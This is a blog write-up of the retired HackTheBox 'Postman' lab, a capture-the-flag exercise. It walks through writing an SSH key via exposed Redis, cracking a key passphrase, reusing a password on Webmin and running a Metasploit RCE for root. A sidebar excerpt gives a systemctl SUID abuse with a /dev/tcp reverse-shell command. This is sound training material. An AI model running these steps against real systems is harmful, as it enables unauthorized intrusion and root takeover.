Skip to main content

HackTheBox -Retired - Postman


HackTheBox -Retired - Postman

Recon:

As always I start with a simple up/down scan on all TCP ports
# nmap -T4 -p- -oX /root/Desktop/HTB/postman/nmapb.xml 10.10.10.160

Then I convert the XML to HTML

Xsltproc /root/desktop/HTB/postman/nmapb.xml -o /root/Desktop/HTB/postman/nmapb.html


Ok we see port 22,80,6379 and 1000

Lets scan just those ports with the -A to finger os/services

Nmap -T4 -p 22,80, 6379,10000 -oX /root/Desktop/HTB/postman/nmapf.xml

Convert that to html too

Xsltproc /root/Desktop/HTB/postman/nmapf.xml -o /root/Desktop/HTB/postman/nmpaf.html




Ok we got SSH (Openssh 7.6p1) on port 22
HTTP ( Apache 2.4.29) on port 80
REDIS ( 4.0.9) on 6379
WEBMIN (1.910) on 10000

Let's see what's running on port 80


Just a generic page with not much to poke at

Let's run dirb at port 80 and see what we see

It found some directories to poke around in /css /fonts /images /js and 
/Uploads

I really like finding dir's that are called uploads, usually that means there is someway to upload a file to the server…… 



What about port 1000 webmin?


Its running in ssl


Needs creds..

Stephen Rannazzisi Kevin GIF by HULU
Let's do a little digging on the Redis service.. So what is Redis?


Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.

It has a cli


Let's install it

Sudo apt-get install redis

Let's see if we can connect up to it


Cool, we can… so what can we do?





Exploit:



When I come across a tool I don't have any experience with I like to google the tools name then pentest to see what are the juicy bits



Inserting our own ssh key on to the server to connect up..

Sounds worth a try.




Let's start with Generating our SSH keys

ssh-keygen -t rsa



Now we are going to put some padding around the pub key just like they blog
(echo -e "\n\n"; cat ./keyz.pub; echo -e "\n\n") > pubkey.txt

Now we need to move the file over to redis

cat ./pubkey.txt | redis-cli -h postman.htb -x set crackit

Connect backup to redis to save our file

redis-cli -h postman.htb

Now this part took a while to find out where to save the pub key.

When connected up we were in this directory


/var/lib/redis

I tried setting the dir to /home.. But got permission denied.

But what if this file path is the home directory for a user named redis… if we add our file here in .ssh maybe we can get our shell?
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

This should take the file we put in redis and save it as a file named "authorized_keys" in the /.ssh folder


Now we can hopefully ssh in as redis
 ssh -i ./keyz redis@postman.htb

Alright we have a foothold as redis..

Let's copy over LinEnum.sh to see if we can find any path for escalation.



Check this out

A backup of a key in a folder we might have access to?





We got a private key… I just used the clipboard to copy it locally to my machine
I changed the permission to only my user so SSH wouldn't complain about it being too open.

I save it as MattPriv

 

There's a passphrase… no problem we can get rid of that..


We can use ssh2john to format the key to a format that john likes


/usr/share/john/ssh2john.py  ./MattPriv > johnmattpriv.txt


Now we just need to feed it to john

 sudo john --wordlist=/home/circusmonkey/rockyou.txt --format=SSH ./johnmattpriv.txt




That didn't take long computer2008 is the password for the SSH key


It's not letting us SSH with that password… 
30 Rock GIF


What about that webmin thing we found earlier? It needed creds… hopefully Matt re-uses passwords

An guess what?

He did, got in with Matt computer2008.


Googling around I found this authenticated RCE which if it works will give us root on the box..


Let's try it

Fire up metasploit and search webmin

Use 3

Set our options

We need to set the password, username, rhosts, lhosts and set the SSL flags to True since our victim is using ssl   *** you might see i mistyped the password option.. I Fixed that after metasploit complained


We are in as root

Let's just grab our flags now


The shell is not working great


Did the command "Shell" on the session to get a better shell


All done

# pwd 
pwd
/home/Matt
# cat user.txt
cat user.txt
517a***************************
# cat /root/root.txt
cat /root/root.txt
a257*******************************

Easy Office Space GIF

Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more